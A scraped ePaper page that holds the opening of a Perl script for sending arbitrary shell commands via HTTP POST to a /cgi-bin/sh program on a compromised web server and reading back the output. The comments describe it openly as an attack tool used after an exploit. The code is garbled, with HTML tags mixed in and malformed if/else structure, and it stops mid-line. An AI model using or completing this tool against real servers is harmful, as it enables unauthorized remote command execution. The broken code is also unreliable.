Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
# Able to send arbitrary commands to http://TARGET/cgi-bin/sh<br />
# and have them executed on the server. This is possible only if<br />
# sh is placed in cgi-bin. (perhaps after running some .. ah.. exploit)<br />
#<br />
# POST can send text to a back-end web program's standard input<br />
# This program is used to feed commands to sh on a remote<br />
# webserver via standard input, and get the output on standard<br />
# output, back to us, via HTTP.<br />
#<br />
# Note: We cannot use this with a form, because forms al<strong>way</strong>s<br />
# send variable=value pairs back to the back-end web program. We<br />
# want to send commands here<br />
#<br />
# Things to be careful about (and which is why this program helps)<br />
#<br />
# a) We have to make sure that the last command we send is an "exit"<br />
# otherwise, the command shell will not die<br />
# on the remote server.<br />
#<br />
# b) Since we are sending commands via POST, we have to calculate<br />
# the number of characters sent, and use that as a Content-length<br />
# value.<br />
use IO::Socket;<br />
use IO::Handle;<br />
if(defined($ARGV[0])) {<br />
}<br />
$server = $ARGV[0];<br />
else {